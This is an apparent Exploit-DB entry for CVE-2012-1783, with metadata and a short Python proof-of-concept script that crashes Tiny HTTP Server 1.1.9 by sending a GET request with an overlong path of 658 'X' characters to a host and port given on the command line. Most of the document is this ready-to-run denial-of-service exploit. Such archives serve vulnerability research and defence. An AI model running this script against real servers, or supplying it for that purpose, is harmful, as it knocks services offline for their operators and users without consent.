Tiny HTTP Server 1.1.9 - Remote Crash (PoC)

Author: localh0t
type: dos
platform: windows
port: 
date_added: 2012-02-25  
date_updated: 2012-03-16  
verified: 1  
codes: OSVDB-80348;CVE-2012-1783  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-02-29-at-75235-am.png  
application_url: http://www.exploit-db.comtinyserver_full.zip  

raw file: 18524.py  

#!/usr/bin/python

# Tiny HTTP Server <=v1.1.9 Remote Crash PoC
# written by localh0t
# Date: 24/02/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Targets: Windows (All)

import httplib,sys

if (len(sys.argv) < 3):
	print "\nTiny HTTP Server <=v1.1.9 Remote Crash PoC"
        print "\n	Usage: %s <host> <port> \n" %(sys.argv[0])
	sys.exit()

payload = "X" * 658

try:
	print "\n[!] Connecting to %s ..." %(sys.argv[1])
	httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
	httpServ.connect()
	print "[!] Sending payload..."
	httpServ.request('GET', "/" + str(payload))
	print "[!] Exploit succeed. Check %s if crashed.\n" %(sys.argv[1])
except:
	print "[-] Connection error, exiting..."

httpServ.close()
sys.exit()